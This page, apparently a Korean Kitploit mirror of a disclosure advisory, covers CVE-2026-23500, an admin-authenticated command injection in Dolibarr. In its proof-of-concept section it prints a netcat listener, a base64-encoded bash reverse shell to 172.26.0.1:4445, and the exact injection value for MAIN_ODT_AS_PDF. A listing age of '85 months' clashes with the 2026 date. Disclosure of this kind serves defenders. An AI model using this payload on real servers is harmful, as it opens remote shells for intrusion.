Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-23500 — CVE-2026-23500 - Dolibarr의 MAIN_ODT_AS_PDF 구성을 통한 OS 명령 주입 (RCE) | Kitploit
도구/GitHubGitHub/lukasz-rybak/cve-2026-23500
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPapers & ResearchLearning & Education
GitHublukasz-rybak/cve-2026-23500

CVE-2026-23500

CVE-2026-23500 - Dolibarr의 MAIN_ODT_AS_PDF 구성을 통한 OS 명령 주입 (RCE)

저장소 보기
85개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-23500: Dolibarr의 MAIN_ODT_AS_PDF 구성 변수를 통한 OS 명령 주입(RCE)

개요

필드세부 정보
CVE IDCVE-2026-23500
심각도CRITICAL
보안 권고GHSA-w5j3-8fcr-h87w
발견자Lukasz Rybak

영향을 받는 제품

  • Dolibarr/dolibarr (버전: 22.0.4 이하)
  • 패치 버전: 23.0

CWE 분류

  • CWE-78: OS 명령에 사용되는 특수 요소의 부적절한 중화('OS Command Injection')

상세 정보

요약

인증된 관리자가 MAIN_ODT_AS_PDF 구성 상수에 악성 페이로드를 주입하여 임의의 운영 체제 명령을 실행할 수 있습니다. 이 취약점은 ODT를 PDF로 변환하는 과정에서 애플리케이션이 exec() 함수에 명령 경로를 전달하기 전에 이를 제대로 검증하거나 이스케이프하지 않기 때문에 발생합니다.

세부 사항

이 취약점은 htdocs/includes/odtphp/odf.php에 있습니다. 시스템이 ODT 문서를 PDF로 변환하려고 할 때(예: 견적서, 청구서), MAIN_ODT_AS_PDF 전역 설정을 사용하여 셸 명령을 구성합니다.

코드 스니펫 (htdocs/includes/odtphp/odf.php, 약 930번째 줄):

$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);
// ...
exec($command, $output_arr, $retval);

$name 파일 이름은 escapeshellcmd()를 사용하여 검증되지만, 구성 변수 MAIN_ODT_AS_PDF는 데이터베이스에서 직접 가져와 문자열 시작 부분에 연결됩니다. 관리자 권한을 가진 공격자는 이 변수에 명령 구분자(예: ;)와 임의의 명령이 포함되도록 설정할 수 있습니다.

PoC

전제 조건:

  1. 관리자로 로그인합니다.
  2. "상업 견적서(Commercial Proposals)" 모듈이 활성화되어 있고 해당 설정에서 "ODT 템플릿"이 활성화되어 있는지 확인합니다.

재현 단계 (리버스 셸):

  1. 공격자 머신에서 netcat 리스너를 시작합니다 (IP: 172.26.0.1, 포트: 4445):
nc -lvnp 4445
  1. 페이로드를 준비합니다. 특수 문자(예: & 또는 >)가 웹 애플리케이션이나 셸에 의해 이스케이프되는 문제를 피하기 위해 리버스 셸 명령을 Base64로 인코딩합니다:

    # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
    echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
    # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
    
  2. **홈(Home) -> 설정(Setup) -> 기타 설정(Other Setup)**으로 이동합니다.

  3. 다음 주입 페이로드로 MAIN_ODT_AS_PDF 상수를 추가하거나 수정합니다:

    jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
    

    (설명: jodconverter는 초기 검사를 통과하고, ;는 명령 구분자 역할을 하며, 파이프라인이 Base64 페이로드를 디코딩하여 실행합니다).

    image
  4. **거래(Commerce) -> 새 견적서(New proposal)**로 이동하여 초안을 만들고 ODT 템플릿(예: generic_proposal_odt)을 선택한 다음 **생성(Generate)**을 클릭합니다.

    image
image image
  1. netcat 리스너를 확인합니다. 연결이 수립되어 서버에서 셸을 획득하게 됩니다:
image

영향

원격 코드 실행(RCE). 관리자 계정에 접근한 공격자(또는 악의적인 관리자)는 웹 서버 사용자(일반적으로 www-data)의 권한으로 기본 서버에서 임의의 명령을 실행할 수 있습니다. 이를 통해 다음이 가능합니다:

  • 민감한 구성 파일(데이터베이스 자격 증명) 읽기.
  • 애플리케이션 코드 수정.
  • 서버 구성에 따른 전체 시스템 장악(예: docker escape, 피벗팅).

크레딧

Łukasz Rybak이 보고함

참고 자료

  • https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23500

면책 조항

이 CVE는 조정된 취약점 공개 절차에 따라 책임 있는 방식으로 공개되었습니다. 여기에 제공된 정보는 교육 및 방어 목적으로만 사용됩니다.

도구 다운로드